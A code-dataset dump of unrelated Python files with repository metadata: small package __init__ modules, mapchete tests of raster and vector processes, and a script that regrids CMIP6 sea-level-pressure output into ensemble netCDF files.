eda170119708e59920c23a03834af915ecca24ce
|
[
"MIT"
] | null | null | null |
mudi/ref/__init__.py
|
getzlab/mudi
|
eda170119708e59920c23a03834af915ecca24ce
|
[
"MIT"
] | null | null | null |
from .markers.immune_markers import IMMUNE_MARKERS
from .markers.immune_markers import IMMUNE_BROAD_MARKERS
| 36
| 56
| 0.888889
| 15
| 108
| 6.066667
| 0.333333
| 0.428571
| 0.373626
| 0.527473
| 0.791209
| 0.791209
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 108
| 2
| 57
| 54
| 0.91
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
2433889e73ffbecdb96177af6511d3cc22ee8904
| 8,730
|
py
|
Python
|
test/test_processes.py
|
Scartography/mapchete
|
f7d1a74acb4021adfd3053501416d2b974c40af9
|
[
"MIT"
] | 161
|
2016-02-20T15:18:13.000Z
|
2022-03-28T11:55:32.000Z
|
test/test_processes.py
|
Scartography/mapchete
|
f7d1a74acb4021adfd3053501416d2b974c40af9
|
[
"MIT"
] | 387
|
2015-08-12T07:16:56.000Z
|
2022-03-30T14:27:12.000Z
|
test/test_processes.py
|
Scartography/mapchete
|
f7d1a74acb4021adfd3053501416d2b974c40af9
|
[
"MIT"
] | 20
|
2016-02-22T12:51:54.000Z
|
2022-01-30T22:54:08.000Z
|
"""Test Mapchete commons module."""
import numpy as np
import numpy.ma as ma
import mapchete
from mapchete.processes.examples import example_process
from mapchete.processes import contours, convert, hillshade
def test_example_process(cleantopo_tl):
with mapchete.open(cleantopo_tl.path) as mp:
zoom = max(mp.config.zoom_levels)
# tile containing data
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
output = example_process.execute(user_process)
assert isinstance(output, ma.masked_array)
# empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
output = example_process.execute(user_process)
assert output == "empty"
def test_convert_raster(cleantopo_tl, cleantopo_tl_tif, landpoly):
with mapchete.open(dict(cleantopo_tl.dict, input=dict(inp=cleantopo_tl_tif))) as mp:
zoom = max(mp.config.zoom_levels)
# execute without clip
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert isinstance(convert.execute(user_process), np.ndarray)
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert convert.execute(user_process) == "empty"
with mapchete.open(
dict(cleantopo_tl.dict, input=dict(inp=cleantopo_tl_tif, clip=landpoly))
) as mp:
zoom = max(mp.config.zoom_levels)
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
# tile with data
default = convert.execute(user_process)
assert isinstance(default, np.ndarray)
# scale_offset
offset = convert.execute(user_process, scale_offset=2)
assert isinstance(offset, np.ndarray)
# scale_ratio
ratio = convert.execute(user_process, scale_ratio=0.5)
assert isinstance(ratio, np.ndarray)
# clip_to_output_dtype
clip_dtype = convert.execute(
user_process, scale_ratio=2, clip_to_output_dtype="uint8"
)
assert isinstance(clip_dtype, np.ndarray)
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert convert.execute(user_process) == "empty"
def test_convert_vector(cleantopo_tl, landpoly):
with mapchete.open(dict(cleantopo_tl.dict, input=dict(inp=landpoly))) as mp:
zoom = max(mp.config.zoom_levels)
# execute without clip
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert isinstance(convert.execute(user_process), list)
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert convert.execute(user_process) == "empty"
def test_contours(cleantopo_tl, cleantopo_tl_tif, landpoly):
with mapchete.open(dict(cleantopo_tl.dict, input=dict(dem=cleantopo_tl_tif))) as mp:
zoom = max(mp.config.zoom_levels)
# execute without clip
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
output = contours.execute(user_process)
assert isinstance(output, list)
assert output
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert contours.execute(user_process) == "empty"
with mapchete.open(
dict(cleantopo_tl.dict, input=dict(dem=cleantopo_tl_tif, clip=landpoly))
) as mp:
zoom = max(mp.config.zoom_levels)
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
output = contours.execute(user_process)
assert isinstance(output, list)
assert output
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert contours.execute(user_process) == "empty"
def test_hillshade(cleantopo_tl, cleantopo_tl_tif, landpoly):
with mapchete.open(dict(cleantopo_tl.dict, input=dict(dem=cleantopo_tl_tif))) as mp:
zoom = max(mp.config.zoom_levels)
# execute without clip
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert isinstance(hillshade.execute(user_process), np.ndarray)
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert hillshade.execute(user_process) == "empty"
with mapchete.open(
dict(cleantopo_tl.dict, input=dict(dem=cleantopo_tl_tif, clip=landpoly))
) as mp:
zoom = max(mp.config.zoom_levels)
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert isinstance(hillshade.execute(user_process), np.ndarray)
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert hillshade.execute(user_process) == "empty"
| 38.628319
| 88
| 0.632532
| 1,056
| 8,730
| 5.006629
| 0.071023
| 0.096841
| 0.068092
| 0.099868
| 0.895026
| 0.88292
| 0.86533
| 0.86533
| 0.86533
| 0.857575
| 0
| 0.003293
| 0.269416
| 8,730
| 225
| 89
| 38.8
| 0.825651
| 0.041352
| 0
| 0.727749
| 0
| 0
| 0.005391
| 0
| 0
| 0
| 0
| 0
| 0.109948
| 1
| 0.026178
| false
| 0
| 0.026178
| 0
| 0.052356
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
031dec79a79cdfa78e07c35b5092d442704ffacd
| 163
|
py
|
Python
|
policy_engine/__init__.py
|
KostasPelelis/DiplomaThesis
|
5ec2b33f32fa604c69c7d88b3f97c5d2112bb7eb
|
[
"MIT"
] | null | null | null |
policy_engine/__init__.py
|
KostasPelelis/DiplomaThesis
|
5ec2b33f32fa604c69c7d88b3f97c5d2112bb7eb
|
[
"MIT"
] | null | null | null |
policy_engine/__init__.py
|
KostasPelelis/DiplomaThesis
|
5ec2b33f32fa604c69c7d88b3f97c5d2112bb7eb
|
[
"MIT"
] | null | null | null |
__version__ = '0.0.1'
from policy_engine.policy_engine import PolicyEngine
from policy_engine.policy import Policy
from logger import init_logging
init_logging()
| 23.285714
| 52
| 0.840491
| 24
| 163
| 5.333333
| 0.458333
| 0.28125
| 0.25
| 0.34375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020548
| 0.104294
| 163
| 7
| 53
| 23.285714
| 0.856164
| 0
| 0
| 0
| 0
| 0
| 0.030488
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0686ed284a528477bb678e37b50ff259f541af52
| 206
|
py
|
Python
|
copycat/data_pipelines/assemblers/__init__.py
|
stungkit/Copycat-abstractive-opinion-summarizer
|
04fe5393a7bb6883516766b762f6a0c530e95375
|
[
"MIT"
] | 51
|
2020-09-25T07:05:01.000Z
|
2022-03-17T12:07:40.000Z
|
copycat/data_pipelines/assemblers/__init__.py
|
stungkit/Copycat-abstractive-opinion-summarizer
|
04fe5393a7bb6883516766b762f6a0c530e95375
|
[
"MIT"
] | 4
|
2020-10-19T10:00:22.000Z
|
2022-03-14T17:02:47.000Z
|
copycat/data_pipelines/assemblers/__init__.py
|
stungkit/Copycat-abstractive-opinion-summarizer
|
04fe5393a7bb6883516766b762f6a0c530e95375
|
[
"MIT"
] | 22
|
2020-09-22T01:06:47.000Z
|
2022-01-26T14:20:09.000Z
|
from .train_pipeline import assemble_train_pipeline
from .eval_pipeline import assemble_eval_pipeline
from .infer_pipeline import assemble_infer_pipeline
from .vocab_pipeline import assemble_vocab_pipeline
| 41.2
| 51
| 0.902913
| 28
| 206
| 6.214286
| 0.285714
| 0.321839
| 0.505747
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07767
| 206
| 4
| 52
| 51.5
| 0.915789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
068ca0072816a116c009c72316160a7b08a9b575
| 33,054
|
py
|
Python
|
psl_extraction.py
|
ubbu36/CMIP6_pacific_analysis
|
b348142f76d3d5e76bd3908235495adf564d6756
|
[
"MIT"
] | 4
|
2021-08-02T02:21:52.000Z
|
2022-01-29T04:00:40.000Z
|
psl_extraction.py
|
ubbu36/CMIP6_pacific_analysis
|
b348142f76d3d5e76bd3908235495adf564d6756
|
[
"MIT"
] | null | null | null |
psl_extraction.py
|
ubbu36/CMIP6_pacific_analysis
|
b348142f76d3d5e76bd3908235495adf564d6756
|
[
"MIT"
] | 1
|
2021-08-02T02:21:40.000Z
|
2021-08-02T02:21:40.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 29 12:33:20 2020
@author: ullaheede
"""
# module import
import matplotlib.pyplot as plt
import cartopy.crs as ccrs
import numpy as np
import xarray as xr
import xesmf as xe
import pandas as pd
def regrid_anomaly(forcing,a):
#control
# uas_control= control['uas']
# uas_control= control['U']
#4xCO2
uas_4xCO2=forcing['psl']
# uas_4xCO2=forcing['U']
# control_timemean=uas_control.mean("time")
uas_4xCO2_anom=uas_4xCO2#-control_timemean
#uas_4xCO2_anom_an=uas_4xCO2_anom
uas_4xCO2_anom_an=uas_4xCO2_anom.groupby('time.year').mean('time')
ds_out = xr.Dataset({'lat': (['lat'], np.arange(-90, 90, 1.0)),
'lon': (['lon'], np.arange(0, 359, 1)),
}
)
regridder = xe.Regridder(uas_4xCO2_anom_an, ds_out, 'bilinear')
uas_regrid = regridder(uas_4xCO2_anom_an)
return uas_regrid
#%%
# forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_ACCESS-ESM1-5_historical_r1i1p1f1_gn_185001-201412.nc')
# a=int(forcing.sizes['time']/12)
# output=regrid_anomaly(forcing,a)
# mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_ACCESS-ESM1-5_historical_r2i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_ACCESS-ESM1-5_historical_r10i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
# forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/WIND_historical/uas_Amon_ACCESS-ESM1-5_historical_r10i1p1f1_gn_185001-201412.nc')
# a=int(forcing.sizes['time']/12)
# output=regrid_anomaly(forcing,a)
# mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_ACCESS-ESM1-5.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_ACCESS-ESM1-5_hist-GHG_r1i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_ACCESS-ESM1-5_hist-GHG_r2i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
# forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/WIND_historical/uas_Amon_ACCESS-ESM1-5_historical_r10i1p1f1_gn_185001-201412.nc')
# a=int(forcing.sizes['time']/12)
# output=regrid_anomaly(forcing,a)
# mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_ACCESS-ESM1-5.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_ACCESS-ESM1-5_hist-aer_r3i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
mylist=xr.concat([output], 'ens_member')
ens_number=['r1']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_GFDL-ESM4.nc')
#%%
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_historical_r1i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_historical_r2i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_historical_r3i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_BCC-CSM2-MR.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_hist-GHG_r1i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_hist-GHG_r2i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_hist-GHG_r3i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_BCC-CSM2-MR.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_hist-aer_r1i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_hist-aer_r2i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_hist-aer_r2i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_BCC-CSM2-MR.nc')
#%%
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_historical_r7i1p2f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_historical_r8i1p2f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_historical_r10i1p2f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_CanESM5.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_hist-GHG_r3i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_hist-GHG_r5i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_hist-GHG_r6i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_CanESM5.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_hist-aer_r3i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_hist-aer_r4i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_hist-aer_r10i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_CanESM5.nc')
#%%
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_historical_r1i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_historical_r2i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_historical_r3i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_CESM2.nc')
#######################
forcing=xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_hist-GHG_r1i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing=xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_hist-GHG_r2i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing=xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_hist-GHG_r3i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_CESM2.nc')
#######################
forcing=xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_hist-aer_r1i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing=xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_hist-aer_r3i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_CESM2.nc')
#%%
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_historical_r1i1p1f2_gr_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_historical_r2i1p1f2_gr_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_historical_r3i1p1f2_gr_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_CNRM-CM6-1.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_hist-GHG_r1i1p1f2_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('//Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_hist-GHG_r4i1p1f2_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_hist-GHG_r5i1p1f2_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_CNRM-CM6-1.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_hist-aer_r1i1p1f2_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_hist-aer_r2i1p1f2_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_hist-aer_r3i1p1f2_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_CNRM-CM6-1.nc')
#%%
forcing=xr.open_mfdataset('//Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_FGOALS-g3_historical_r1i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
